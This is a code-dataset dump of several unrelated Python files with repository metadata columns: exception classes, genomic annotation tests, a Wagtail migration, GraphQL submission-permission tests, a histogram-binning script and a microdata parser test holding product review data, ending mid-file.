[ "Unlicense" ]
null
null
null
""" Contains exception types """ from __future__ import unicode_literals class ConfigError(Exception): """ Errors related to configuration """ class PinError(Exception): """ Errors related to Pin """
16.307692
43
0.712264
22
212
6.636364
0.727273
0.205479
0.30137
0.328767
0
0
0
0
0
0
0
0
0.174528
212
12
44
17.666667
0.834286
0.377358
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.333333
0
1
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
7
385b02c301ec18f738504980abcf084330ced6be
2,599
py
Python
tests/annotate_variants/test_add_annotations.py
Varstation/genmod
991a0fca36936b5dde49a95e8ea1d4336288c7c0
[ "MIT" ]
46
2015-01-15T17:53:22.000Z
2021-08-09T09:35:29.000Z
tests/annotate_variants/test_add_annotations.py
Varstation/genmod
991a0fca36936b5dde49a95e8ea1d4336288c7c0
[ "MIT" ]
55
2015-06-04T09:09:29.000Z
2021-05-20T10:48:18.000Z
tests/annotate_variants/test_add_annotations.py
moonso/genmod
99b6c9510ffc67fd54c07eab24de5db7345ef95d
[ "MIT" ]
15
2015-02-06T04:08:23.000Z
2021-05-04T10:06:58.000Z
from genmod.annotate_variants.add_annotations import (add_regions, add_exac, add_exac_max, add_thousandg, add_thousandg_max, add_spidex, add_cadd, add_cadd_raw, add_cosmic) def test_add_regions(header): key = 'Annotation' # GIVEN a header without key assert key not in header.info_dict # WHEN adding annotation add_regions(header) # THEN the key should have been added to the header assert key in header.info_dict def test_add_exac(header): key = 'EXACAF' # GIVEN a header without key assert key not in header.info_dict # WHEN adding annotation add_exac(header) # THEN the key should have been added to the header assert key in header.info_dict def test_add_exac_max(header): key = 'EXAC_MAX_AF' # GIVEN a header without key assert key not in header.info_dict # WHEN adding annotation add_exac_max(header) # THEN the key should have been added to the header assert key in header.info_dict def test_add_thousand_g(header): key = '1000GAF' # GIVEN a header without key assert key not in header.info_dict # WHEN adding annotation add_thousandg(header) # THEN the key should have been added to the header assert key in header.info_dict def test_add_thousand_g_max(header): key = '1000G_MAX_AF' # GIVEN a header without key assert key not in header.info_dict # WHEN adding annotation add_thousandg_max(header) # THEN the key should have been added to the header assert key in header.info_dict def test_add_spidex(header): key = 'SPIDEX' # GIVEN a header without key assert key not in header.info_dict # WHEN adding annotation add_spidex(header) # THEN the key should have been added to the header assert key in header.info_dict def test_add_cadd(header): key = 'CADD' # GIVEN a header without key assert key not in header.info_dict # WHEN adding annotation add_cadd(header) # THEN the key should have been added to the header assert key in header.info_dict def test_add_cadd_raw(header): key = 'CADD_raw' # GIVEN a header without key assert key not in header.info_dict # WHEN adding annotation add_cadd_raw(header) # THEN the key should have been added to the header assert key in header.info_dict def test_add_cosmic(header): key = 'COSMIC' # GIVEN a header without key assert key not in header.info_dict # WHEN adding annotation add_cosmic(header) # THEN the key should have been added to the header assert key in header.info_dict
30.576471
77
0.716814
410
2,599
4.368293
0.104878
0.090452
0.120603
0.160804
0.815187
0.815187
0.815187
0.815187
0.815187
0.815187
0
0.004016
0.233551
2,599
84
78
30.940476
0.89508
0.345902
0
0.375
0
0
0.041866
0
0
0
0
0
0.375
1
0.1875
false
0
0.020833
0
0.208333
0
0
0
0
null
0
0
1
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
388697b71d2ffde59abf7e50bc8dea52dfbb96ff
5,545
py
Python
isi_mip/pages/migrations/0007_genericpage.py
ISI-MIP/isimip
c2a78c727337e38f3695031e00afd607da7d6dcb
[ "MIT" ]
4
2017-07-05T08:06:18.000Z
2021-03-01T17:23:18.000Z
isi_mip/pages/migrations/0007_genericpage.py
ISI-MIP/isimip
c2a78c727337e38f3695031e00afd607da7d6dcb
[ "MIT" ]
4
2020-01-31T09:02:57.000Z
2021-04-20T14:04:35.000Z
isi_mip/pages/migrations/0007_genericpage.py
ISI-MIP/isimip
c2a78c727337e38f3695031e00afd607da7d6dcb
[ "MIT" ]
4
2017-10-12T01:48:55.000Z
2020-04-29T13:50:03.000Z
# -*- coding: utf-8 -*- # Generated by Django 1.9.5 on 2016-04-25 10:01 from __future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion import isi_mip.pages.blocks import wagtail.core.blocks import wagtail.core.fields import wagtail.embeds.blocks import wagtail.images.blocks class Migration(migrations.Migration): dependencies = [ ('wagtailcore', '0028_merge'), ('pages', '0006_auto_20160425_1041'), ] operations = [ migrations.CreateModel( name='GenericPage', fields=[ ('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')), ('content', wagtail.core.fields.StreamField((('richtext', wagtail.core.blocks.RichTextBlock()), ('columns_1_to_1', wagtail.core.blocks.StructBlock((('left_column', wagtail.core.blocks.StreamBlock((('rich_text', wagtail.core.blocks.RichTextBlock()), ('link', wagtail.core.blocks.StructBlock((('title', wagtail.core.blocks.CharBlock(required=True)), ('picture', wagtail.images.blocks.ImageChooserBlock(required=False)), ('text', wagtail.core.blocks.RichTextBlock(required=False)), ('link', wagtail.core.blocks.URLBlock(required=False))))), ('embed', wagtail.embeds.blocks.EmbedBlock()), ('faqs', wagtail.core.blocks.StructBlock((('title', wagtail.core.blocks.CharBlock()), ('faqs', wagtail.core.blocks.ListBlock(wagtail.core.blocks.StructBlock((('question', wagtail.core.blocks.CharBlock()), ('answer', wagtail.core.blocks.RichTextBlock()))))))))))), ('right_column', wagtail.core.blocks.StreamBlock((('rich_text', wagtail.core.blocks.RichTextBlock()), ('link', wagtail.core.blocks.StructBlock((('title', wagtail.core.blocks.CharBlock(required=True)), ('picture', wagtail.images.blocks.ImageChooserBlock(required=False)), ('text', wagtail.core.blocks.RichTextBlock(required=False)), ('link', wagtail.core.blocks.URLBlock(required=False))))), ('embed', wagtail.embeds.blocks.EmbedBlock()), ('faqs', wagtail.core.blocks.StructBlock((('title', wagtail.core.blocks.CharBlock()), ('faqs', wagtail.core.blocks.ListBlock(wagtail.core.blocks.StructBlock((('question', wagtail.core.blocks.CharBlock()), ('answer', wagtail.core.blocks.RichTextBlock()))))))))), form_classname='pull-right'))))), ('columns_1_to_2', wagtail.core.blocks.StructBlock((('left_column', wagtail.core.blocks.StreamBlock((('rich_text', wagtail.core.blocks.RichTextBlock()), ('link', wagtail.core.blocks.StructBlock((('title', wagtail.core.blocks.CharBlock(required=True)), ('picture', wagtail.images.blocks.ImageChooserBlock(required=False)), ('text', wagtail.core.blocks.RichTextBlock(required=False)), ('link', wagtail.core.blocks.URLBlock(required=False))))), ('embed', wagtail.embeds.blocks.EmbedBlock()), ('faqs', wagtail.core.blocks.StructBlock((('title', wagtail.core.blocks.CharBlock()), ('faqs', wagtail.core.blocks.ListBlock(wagtail.core.blocks.StructBlock((('question', wagtail.core.blocks.CharBlock()), ('answer', wagtail.core.blocks.RichTextBlock()))))))))))), ('right_column', wagtail.core.blocks.StreamBlock((('rich_text', wagtail.core.blocks.RichTextBlock()), ('link', wagtail.core.blocks.StructBlock((('title', wagtail.core.blocks.CharBlock(required=True)), ('picture', wagtail.images.blocks.ImageChooserBlock(required=False)), ('text', wagtail.core.blocks.RichTextBlock(required=False)), ('link', wagtail.core.blocks.URLBlock(required=False))))), ('embed', wagtail.embeds.blocks.EmbedBlock()), ('faqs', wagtail.core.blocks.StructBlock((('title', wagtail.core.blocks.CharBlock()), ('faqs', wagtail.core.blocks.ListBlock(wagtail.core.blocks.StructBlock((('question', wagtail.core.blocks.CharBlock()), ('answer', wagtail.core.blocks.RichTextBlock()))))))))), form_classname='pull-right'))))), ('columns_2_to_1', wagtail.core.blocks.StructBlock((('left_column', wagtail.core.blocks.StreamBlock((('rich_text', wagtail.core.blocks.RichTextBlock()), ('link', wagtail.core.blocks.StructBlock((('title', wagtail.core.blocks.CharBlock(required=True)), ('picture', wagtail.images.blocks.ImageChooserBlock(required=False)), ('text', wagtail.core.blocks.RichTextBlock(required=False)), ('link', wagtail.core.blocks.URLBlock(required=False))))), ('embed', wagtail.embeds.blocks.EmbedBlock()), ('faqs', wagtail.core.blocks.StructBlock((('title', wagtail.core.blocks.CharBlock()), ('faqs', wagtail.core.blocks.ListBlock(wagtail.core.blocks.StructBlock((('question', wagtail.core.blocks.CharBlock()), ('answer', wagtail.core.blocks.RichTextBlock()))))))))))), ('right_column', wagtail.core.blocks.StreamBlock((('rich_text', wagtail.core.blocks.RichTextBlock()), ('link', wagtail.core.blocks.StructBlock((('title', wagtail.core.blocks.CharBlock(required=True)), ('picture', wagtail.images.blocks.ImageChooserBlock(required=False)), ('text', wagtail.core.blocks.RichTextBlock(required=False)), ('link', wagtail.core.blocks.URLBlock(required=False))))), ('embed', wagtail.embeds.blocks.EmbedBlock()), ('faqs', wagtail.core.blocks.StructBlock((('title', wagtail.core.blocks.CharBlock()), ('faqs', wagtail.core.blocks.ListBlock(wagtail.core.blocks.StructBlock((('question', wagtail.core.blocks.CharBlock()), ('answer', wagtail.core.blocks.RichTextBlock()))))))))), form_classname='pull-right'))))), ('image', isi_mip.pages.blocks.ImageBlock())))), ], options={ 'abstract': False, }, bases=('wagtailcore.page',), ), ]
163.088235
4,621
0.727142
628
5,545
6.356688
0.149682
0.217685
0.327906
0.147295
0.826403
0.826403
0.826403
0.826403
0.826403
0.826403
0
0.008133
0.068711
5,545
33
4,622
168.030303
0.764911
0.012083
0
0
1
0
0.120365
0.004201
0
0
0
0
0
1
0
false
0
0.307692
0
0.423077
0
0
0
0
null
1
1
0
1
1
1
1
1
1
0
0
0
0
0
1
1
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
12
3897bf4e50bd079352e559bee009816e5a6e71bd
98
py
Python
notifier/providers/__init__.py
kirelagin/pynotifier
4025a7954665e0d6c423510eebf7c692c01ff979
[ "BSD-3-Clause" ]
null
null
null
notifier/providers/__init__.py
kirelagin/pynotifier
4025a7954665e0d6c423510eebf7c692c01ff979
[ "BSD-3-Clause" ]
null
null
null
notifier/providers/__init__.py
kirelagin/pynotifier
4025a7954665e0d6c423510eebf7c692c01ff979
[ "BSD-3-Clause" ]
null
null
null
from notifier.providers.print import PrintNotify from notifier.providers.email import EmailNotify
32.666667
48
0.877551
12
98
7.166667
0.666667
0.27907
0.488372
0
0
0
0
0
0
0
0
0
0.081633
98
2
49
49
0.955556
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0.5
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
1
0
8
3899721aa8fca9877f7a38c0c3dbe93129013b37
184
py
Python
yarx/data/__init__.py
mahnerak/yarx
aff3f98714fe940966e6e1ad670e10c059d49985
[ "Apache-2.0" ]
1
2019-08-27T17:38:37.000Z
2019-08-27T17:38:37.000Z
yarx/data/__init__.py
mahnerak/yarx
aff3f98714fe940966e6e1ad670e10c059d49985
[ "Apache-2.0" ]
null
null
null
yarx/data/__init__.py
mahnerak/yarx
aff3f98714fe940966e6e1ad670e10c059d49985
[ "Apache-2.0" ]
1
2019-08-18T18:05:07.000Z
2019-08-18T18:05:07.000Z
from .dataset_readers import FilterConllCorefReader from .dataset_readers import SciERCReader from .dataset_readers import BioRelExDatasetReader from .fields import OptionalListField
30.666667
51
0.88587
19
184
8.421053
0.473684
0.20625
0.3375
0.45
0
0
0
0
0
0
0
0
0.092391
184
5
52
36.8
0.958084
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
8
2a085e1493832e351bcf29f6f07f6293786b43a3
115
py
Python
solutions/python/algorithm/test_add_two_numbers.py
pojozhang/playground
d57786e990c218d6e97da034d0eb4723f05c2ba2
[ "MIT" ]
6
2018-04-12T10:13:40.000Z
2019-02-12T06:32:16.000Z
solutions/python/algorithm/test_add_two_numbers.py
pojozhang/park
81b84bdfb5ff81c4a276691805ef3f718bde4d32
[ "MIT" ]
19
2019-08-11T15:15:53.000Z
2021-02-17T19:13:25.000Z
solutions/python/algorithm/test_add_two_numbers.py
pojozhang/park
81b84bdfb5ff81c4a276691805ef3f718bde4d32
[ "MIT" ]
3
2018-04-12T10:14:40.000Z
2019-07-15T08:41:27.000Z
from add_two_numbers import * def test_add_two_numbers_case_1(): assert two_sum([2, 7, 11, 15], 9) == [0, 1]
19.166667
47
0.669565
22
115
3.136364
0.772727
0.173913
0.376812
0
0
0
0
0
0
0
0
0.106383
0.182609
115
5
48
23
0.62766
0
0
0
0
0
0
0
0
0
0
0
0.333333
1
0.333333
true
0
0.333333
0
0.666667
0
1
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
1
0
1
0
0
7
2a288d7c4f333737c2f187a8c158e9ff591a0681
13,508
py
Python
backend/api/submissions/tests/test_submission_fields.py
patrick91/pycon
9d7e15f540adcf0eaceb61fdbf67206d6aef73ec
[ "MIT" ]
2
2017-07-18T21:51:25.000Z
2017-12-23T11:08:39.000Z
backend/api/submissions/tests/test_submission_fields.py
patrick91/pycon
9d7e15f540adcf0eaceb61fdbf67206d6aef73ec
[ "MIT" ]
23
2017-07-18T20:22:38.000Z
2018-01-05T05:45:15.000Z
backend/api/submissions/tests/test_submission_fields.py
patrick91/pycon
9d7e15f540adcf0eaceb61fdbf67206d6aef73ec
[ "MIT" ]
2
2017-07-18T21:27:33.000Z
2017-07-18T22:07:03.000Z
import pytest from schedule.models import ScheduleItem pytestmark = pytest.mark.django_db QUERY = """ query SubmissionQuery($id: ID!) { submission(id: $id) { abstract audienceLevel { name } elevatorPitch id type { name } topic { name } title tags { name } speakerLevel slug previousTalkVideo notes languages { code } duration { name } conference { code } } } """ @pytest.fixture def other_user(user_factory): return user_factory() def _submission(submission_factory, user, **kwargs): return submission_factory( speaker_id=user.id, languages=("it", "en"), tags=("python", "GraphQL"), **kwargs ) def _query(graphql_client, submission): response = graphql_client.query( QUERY, variables={"id": submission.hashid}, ) assert not response.get("errors") return response["data"] def test_voting_open_and_user_cannot_vote( graphql_client, submission_factory, user, other_user, mocker ): submission = _submission(submission_factory, user) graphql_client.force_login(other_user) can_vote_mock = mocker.patch( "api.submissions.permissions.pastaporto_user_info_can_vote", return_value=False ) data = _query(graphql_client, submission) # ✔️ public assert data["submission"]["title"] == submission.title assert data["submission"]["slug"] == submission.slug # ❌ restricted assert data["submission"]["elevatorPitch"] is None assert data["submission"]["abstract"] is None assert data["submission"]["topic"] is None assert data["submission"]["type"] is None assert data["submission"]["duration"] is None assert data["submission"]["audienceLevel"] is None assert data["submission"]["languages"] is None assert data["submission"]["tags"] is None # ❌ private assert data["submission"]["speakerLevel"] is None assert data["submission"]["previousTalkVideo"] is None assert data["submission"]["notes"] is None can_vote_mock.assert_called() def test_voting_open_and_user_can_vote( graphql_client, submission_factory, user, other_user, mocker ): submission = _submission(submission_factory, user) graphql_client.force_login(other_user) can_vote_mock = mocker.patch( "api.submissions.permissions.pastaporto_user_info_can_vote", return_value=True ) data = _query(graphql_client, submission) # ✔️ public assert data["submission"]["title"] == submission.title assert data["submission"]["slug"] == submission.slug # ✔️ restricted assert data["submission"]["elevatorPitch"] == submission.elevator_pitch assert data["submission"]["abstract"] == submission.abstract assert data["submission"]["topic"]["name"] == submission.topic.name assert data["submission"]["type"]["name"] == submission.type.name assert data["submission"]["duration"]["name"] == submission.duration.name assert data["submission"]["audienceLevel"]["name"] == submission.audience_level.name assert data["submission"]["languages"] == [ {"code": "it"}, {"code": "en"}, ] assert data["submission"]["tags"] == [ {"name": "python"}, {"name": "GraphQL"}, ] # ❌ private assert data["submission"]["speakerLevel"] is None assert data["submission"]["previousTalkVideo"] is None assert data["submission"]["notes"] is None can_vote_mock.assert_called() def test_voring_closed_and_user_is_authenticated( graphql_client, other_user, submission_factory, user ): submission = _submission(submission_factory, user, conference__active_voting=False) graphql_client.force_login(other_user) data = _query(graphql_client, submission) # ✔️ public assert data["submission"]["title"] == submission.title assert data["submission"]["slug"] == submission.slug # ❌ restricted assert data["submission"]["elevatorPitch"] is None assert data["submission"]["abstract"] is None assert data["submission"]["topic"] is None assert data["submission"]["type"] is None assert data["submission"]["duration"] is None assert data["submission"]["audienceLevel"] is None assert data["submission"]["languages"] is None assert data["submission"]["tags"] is None # ❌ private assert data["submission"]["speakerLevel"] is None assert data["submission"]["previousTalkVideo"] is None assert data["submission"]["notes"] is None def test_voring_closed_and_user_is_not_authenticated( graphql_client, submission_factory, user ): submission = _submission(submission_factory, user, conference__active_voting=False) data = _query(graphql_client, submission) # ✔️ public assert data["submission"]["title"] == submission.title assert data["submission"]["slug"] == submission.slug # ❌ restricted assert data["submission"]["elevatorPitch"] is None assert data["submission"]["abstract"] is None assert data["submission"]["topic"] is None assert data["submission"]["type"] is None assert data["submission"]["duration"] is None assert data["submission"]["audienceLevel"] is None assert data["submission"]["languages"] is None assert data["submission"]["tags"] is None # ❌ private assert data["submission"]["speakerLevel"] is None assert data["submission"]["previousTalkVideo"] is None assert data["submission"]["notes"] is None def test_accepted_submission_user_can_see_public_and_restricted_fields( graphql_client, submission_factory, user, schedule_item_factory ): submission = _submission(submission_factory, user) schedule_item_factory( submission=submission, conference=submission.conference, type=ScheduleItem.TYPES.submission, ) data = _query(graphql_client, submission) # ✔️ public assert data["submission"]["title"] == submission.title assert data["submission"]["slug"] == submission.slug # ✔️ restricted assert data["submission"]["elevatorPitch"] == submission.elevator_pitch assert data["submission"]["abstract"] == submission.abstract assert data["submission"]["topic"]["name"] == submission.topic.name assert data["submission"]["type"]["name"] == submission.type.name assert data["submission"]["duration"]["name"] == submission.duration.name assert data["submission"]["audienceLevel"]["name"] == submission.audience_level.name assert data["submission"]["languages"] == [ {"code": "it"}, {"code": "en"}, ] assert data["submission"]["tags"] == [ {"name": "python"}, {"name": "GraphQL"}, ] # ❌ private assert data["submission"]["speakerLevel"] is None assert data["submission"]["previousTalkVideo"] is None assert data["submission"]["notes"] is None def test_admin_user_can_see_everything( graphql_client, admin_user, submission_factory, user ): submission = _submission(submission_factory, user) graphql_client.force_login(admin_user) data = _query(graphql_client, submission) # ✔️ public assert data["submission"]["title"] == submission.title assert data["submission"]["slug"] == submission.slug # ✔️ restricted assert data["submission"]["elevatorPitch"] == submission.elevator_pitch assert data["submission"]["abstract"] == submission.abstract assert data["submission"]["topic"]["name"] == submission.topic.name assert data["submission"]["type"]["name"] == submission.type.name assert data["submission"]["duration"]["name"] == submission.duration.name assert data["submission"]["audienceLevel"]["name"] == submission.audience_level.name assert data["submission"]["languages"] == [ {"code": "it"}, {"code": "en"}, ] assert data["submission"]["tags"] == [ {"name": "python"}, {"name": "GraphQL"}, ] # ✔️ private assert data["submission"]["speakerLevel"] == submission.speaker_level assert data["submission"]["previousTalkVideo"] == submission.previous_talk_video assert data["submission"]["notes"] == submission.notes def test_submission_author_can_see_everything(graphql_client, submission_factory, user): submission = _submission(submission_factory, user) graphql_client.force_login(user) data = _query(graphql_client, submission) # ✔️ public assert data["submission"]["title"] == submission.title assert data["submission"]["slug"] == submission.slug # ✔️ restricted assert data["submission"]["elevatorPitch"] == submission.elevator_pitch assert data["submission"]["abstract"] == submission.abstract assert data["submission"]["topic"]["name"] == submission.topic.name assert data["submission"]["type"]["name"] == submission.type.name assert data["submission"]["duration"]["name"] == submission.duration.name assert data["submission"]["audienceLevel"]["name"] == submission.audience_level.name assert data["submission"]["languages"] == [ {"code": "it"}, {"code": "en"}, ] assert data["submission"]["tags"] == [ {"name": "python"}, {"name": "GraphQL"}, ] # ✔️ private assert data["submission"]["speakerLevel"] == submission.speaker_level assert data["submission"]["previousTalkVideo"] == submission.previous_talk_video assert data["submission"]["notes"] == submission.notes def test_ranked_submission_user_can_see_public_and_restricted_fields( graphql_client, conference, user, submission_factory, rank_request_factory, mocker, ): mocker.patch("voting.models.ranking.get_users_data_by_ids", return_value={}) submission = _submission(submission_factory, user=user, conference=conference) rank_request_factory( conference=conference, submissions=[submission], is_public=True ) data = _query(graphql_client, submission) # ✔️ public assert data["submission"]["title"] == submission.title assert data["submission"]["slug"] == submission.slug # ✔️ restricted assert data["submission"]["elevatorPitch"] == submission.elevator_pitch assert data["submission"]["abstract"] == submission.abstract assert data["submission"]["topic"]["name"] == submission.topic.name assert data["submission"]["type"]["name"] == submission.type.name assert data["submission"]["duration"]["name"] == submission.duration.name assert data["submission"]["audienceLevel"]["name"] == submission.audience_level.name assert data["submission"]["languages"] == [ {"code": "it"}, {"code": "en"}, ] assert data["submission"]["tags"] == [ {"name": "python"}, {"name": "GraphQL"}, ] # ❌ private assert data["submission"]["speakerLevel"] is None assert data["submission"]["previousTalkVideo"] is None assert data["submission"]["notes"] is None def test_ranking_is_not_public_cannot_see_restricted_and_private_fields( graphql_client, rank_request_factory, conference, user, submission_factory, mocker ): mocker.patch("voting.models.ranking.get_users_data_by_ids", return_value={}) submission = _submission(submission_factory, user=user, conference=conference) rank_request_factory( conference=conference, submissions=[submission], is_public=False ) data = _query(graphql_client, submission) # ✔️ public assert data["submission"]["title"] == submission.title assert data["submission"]["slug"] == submission.slug # ❌ restricted assert data["submission"]["elevatorPitch"] is None assert data["submission"]["abstract"] is None assert data["submission"]["topic"] is None assert data["submission"]["type"] is None assert data["submission"]["duration"] is None assert data["submission"]["audienceLevel"] is None assert data["submission"]["languages"] is None assert data["submission"]["tags"] is None # ❌ private assert data["submission"]["speakerLevel"] is None assert data["submission"]["previousTalkVideo"] is None assert data["submission"]["notes"] is None def test_ranking_does_not_exists_cannot_see_restricted_and_private_fields( graphql_client, conference_factory, user, submission_factory, ): conference = conference_factory(rankrequest=None) submission = _submission(submission_factory, user=user, conference=conference) data = _query(graphql_client, submission) # ✔️ public assert data["submission"]["title"] == submission.title assert data["submission"]["slug"] == submission.slug # ❌ restricted assert data["submission"]["elevatorPitch"] is None assert data["submission"]["abstract"] is None assert data["submission"]["topic"] is None assert data["submission"]["type"] is None assert data["submission"]["duration"] is None assert data["submission"]["audienceLevel"] is None assert data["submission"]["languages"] is None assert data["submission"]["tags"] is None # ❌ private assert data["submission"]["speakerLevel"] is None assert data["submission"]["previousTalkVideo"] is None assert data["submission"]["notes"] is None
33.939698
88
0.663607
1,427
13,508
6.153469
0.075683
0.148047
0.296094
0.092928
0.895228
0.890104
0.882246
0.877463
0.845462
0.844551
0
0
0.192256
13,508
397
89
34.025189
0.800477
0.024874
0
0.694915
0
0
0.266494
0.01522
0
0
0
0
0.450847
1
0.044068
false
0
0.00678
0.00678
0.061017
0
0
0
0
null
0
1
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
1
0
0
0
0
0
0
0
0
0
8
2a6be5ba8f66ba0a2032e6dad6d1aa1cc04e1229
2,323
py
Python
Curso estadistica descriptiva/tests/agrupacion de datos cuantitativos/adc.py
DarkShadow4/python
4cd94e0cf53ee06c9c31e9272572ca9656697c30
[ "MIT" ]
null
null
null
Curso estadistica descriptiva/tests/agrupacion de datos cuantitativos/adc.py
DarkShadow4/python
4cd94e0cf53ee06c9c31e9272572ca9656697c30
[ "MIT" ]
null
null
null
Curso estadistica descriptiva/tests/agrupacion de datos cuantitativos/adc.py
DarkShadow4/python
4cd94e0cf53ee06c9c31e9272572ca9656697c30
[ "MIT" ]
1
2020-08-19T17:25:22.000Z
2020-08-19T17:25:22.000Z
# Regla de Scott import pandas as pd import numpy as np import math crabs = pd.read_table("../../../../r-basic/data/datacrab.txt", sep = " ") cw = crabs.width n = len(cw) precision = 0.1 # Número de clases As = 3.5*np.std(cw)*n**(-1/3) Ks = math.ceil((max(cw)-min(cw))/As) # Amplitud de clases (precisión a décimas) A = round((max(cw)-min(cw))/Ks, 1) + precision # Establecer limites de intervalos L1 = min(cw)-1/2*precision L = [L1] for lim in range(Ks+1): L.append(round(L1+A*(lim+1), 2)) L X = [] for lim in range(len(L)-2): X.append(round((L[lim]+L[lim+1])/2, 1)) X # Regla de la raíz import pandas as pd import numpy as np import math crabs = pd.read_table("../../../../r-basic/data/datacrab.txt", sep = " ") cw = crabs.width n = len(cw) precision = 0.1 # Número de clases Kr = math.ceil(math.sqrt(n)) # Amplitud de clases (precisión a décimas) A = round((max(cw)-min(cw))/Kr, 1) + precision # Establecer limites de intervalos L1 = min(cw)-1/2*precision L = [L1] for lim in range(Kr+1): L.append(round(L1+A*(lim+1), 2)) L X = [] for lim in range(len(L)-2): X.append(round((L[lim]+L[lim+1])/2, 1)) X # Regla de Sturges import pandas as pd import numpy as np import math crabs = pd.read_table("../../../../r-basic/data/datacrab.txt", sep = " ") cw = crabs.width n = len(cw) precision = 0.1 # Número de clases KS = math.ceil(1+np.log2(n)) # Amplitud de clases (precisión a décimas) A = round((max(cw)-min(cw))/KS, 1) + precision # Establecer limites de intervalos L1 = min(cw)-1/2*precision L = [L1] for lim in range(KS+1): L.append(round(L1+A*(lim+1), 2)) L X = [] for lim in range(len(L)-2): X.append(round((L[lim]+L[lim+1])/2, 1)) X # Regla de Freedman-Diaconis import pandas as pd import numpy as np import math crabs = pd.read_table("../../../../r-basic/data/datacrab.txt", sep = " ") cw = crabs.width n = len(cw) precision = 0.1 # Número de clases Afd = 2*(np.quantile(cw, 0.75)-np.quantile(cw, 0.25))*n**(-1/3) Kfd = math.ceil((max(cw)-min(cw))/Afd) # Amplitud de clases (precisión a décimas) A = round((max(cw)-min(cw))/Kfd, 1) + precision # Establecer limites de intervalos L1 = min(cw)-1/2*precision L = [L1] for lim in range(Kfd+1): L.append(round(L1+A*(lim+1), 2)) L X = [] for lim in range(len(L)-2): X.append(round((L[lim]+L[lim+1])/2, 1)) X
18.733871
73
0.629359
439
2,323
3.321185
0.148064
0.016461
0.043896
0.071331
0.899177
0.899177
0.874486
0.874486
0.874486
0.874486
0
0.03872
0.166164
2,323
123
74
18.886179
0.713991
0.18898
0
0.702703
0
0
0.081414
0.079272
0
0
0
0
0
1
0
false
0
0.162162
0
0.162162
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
aa5683e54afbfd7df3f8f57d7432e8e2a1aa0c8a
16,236
py
Python
6_schema/project/tests/test_parsers/test_microdata.py
neel-jaris/Python-Web-Scraping-Projects
f77426d1351e5b5ca06aacf415388409d89277a9
[ "MIT" ]
15
2019-03-30T02:41:55.000Z
2022-03-21T05:15:28.000Z
6_schema/project/tests/test_parsers/test_microdata.py
neel-jaris/Python-Web-Scraping-Projects
f77426d1351e5b5ca06aacf415388409d89277a9
[ "MIT" ]
1
2021-12-02T17:32:56.000Z
2021-12-02T17:32:56.000Z
6_schema/project/tests/test_parsers/test_microdata.py
neel-jaris/Python-Web-Scraping-Projects
f77426d1351e5b5ca06aacf415388409d89277a9
[ "MIT" ]
9
2019-12-26T19:35:04.000Z
2022-01-24T15:45:27.000Z
from schema.parsers.microdata import format_microdata def test_microdata(): data = [ { "type": "http://schema.org/Product", "properties": { "image": "https://i5.walmartimages.com/asr/ce1033ea-4934-4098-af07-16d0136689fd_1.5cebe0dbf47d95ddc489e506c8cc28f7.jpeg?odnHeight=450&odnWidth=450&odnBg=FFFFFF", "name": [ "Dungeons & Dragons Player's Handbook (Dungeons & Dragons Core Rulebooks)", "", ], "sku": "37784457", "aggregateRating": { "type": "//schema.org/AggregateRating", "properties": { "ratingValue": "4.8", "bestRating": "5", "reviewCount": "32", }, }, "brand": "Wizards RPG Team", "offers": { "type": "//schema.org/Offer", "properties": { "url": "/ip/Dungeons-Dragons-Player-s-Handbook-Dungeons-Dragons-Core-Rulebooks-9780786965601/37784457", "priceValidUntil": "", "priceCurrency": "USD", "price": "27.11", "availability": "//schema.org/InStock", "itemCondition": "//schema.org/NewCondition", "availableDeliveryMethod": "//schema.org/OnSitePickup", "availableAtOrFrom": { "type": "//schema.org/Place", "properties": { "name": "San Leandro Store", "branchCode": "2648", }, }, }, }, "review": [ { "type": "http://schema.org/Review", "properties": { "author": {"type": "http://schema.org/Person", "value": ""} }, }, { "type": "http://schema.org/Review", "properties": { "name": "Can't believe it!! :D", "reviewRating": { "type": "//schema.org/Rating", "properties": { "worstRating": "1", "ratingValue": "5", "bestRating": "5", }, }, "reviewBody": "I've been thinking of getting the Player's Handbook for a while now, but I always felt like it was too much for me to spend.. until I found this!! It's the same book, fully licenses and hard cover, but for a fraction of the price (and it came two days early!). Believe me, I was hesitant at first, but it's the real deal. Anyways.. hope all of y'all have a great day!See more", "author": "Liz,", "datePublished": "February 9, 2019", }, }, { "type": "http://schema.org/Review", "properties": { "name": "Hardcore Hard Cover Awesome!", "reviewRating": { "type": "//schema.org/Rating", "properties": { "worstRating": "1", "ratingValue": "5", "bestRating": "5", }, }, "reviewBody": "The purchase experience was easy. Found exactly what I was looking for online and the free in store pick up was a breeze! The book itself is awesome! The art is GORGEOUS and the details are easy to understand. The book is pretty heavy though so I wouldn't suggest dropping it on your foot. Speaking from experience. Giggle.See more", "author": "AskinYoheC,", "datePublished": "March 1, 2017", }, }, { "type": "http://schema.org/Review", "properties": { "name": "New Edition of Player Rules.", "reviewRating": { "type": "//schema.org/Rating", "properties": { "worstRating": "1", "ratingValue": "5", "bestRating": "5", }, }, "reviewBody": "Adds some new races and a new class. Great advantage/disadvantage feature. Same ole' D&D but better. Highly recommend for the newbie or veteran. NEEDED TO PLAY THE GAME EFFECTIVELYSee more", 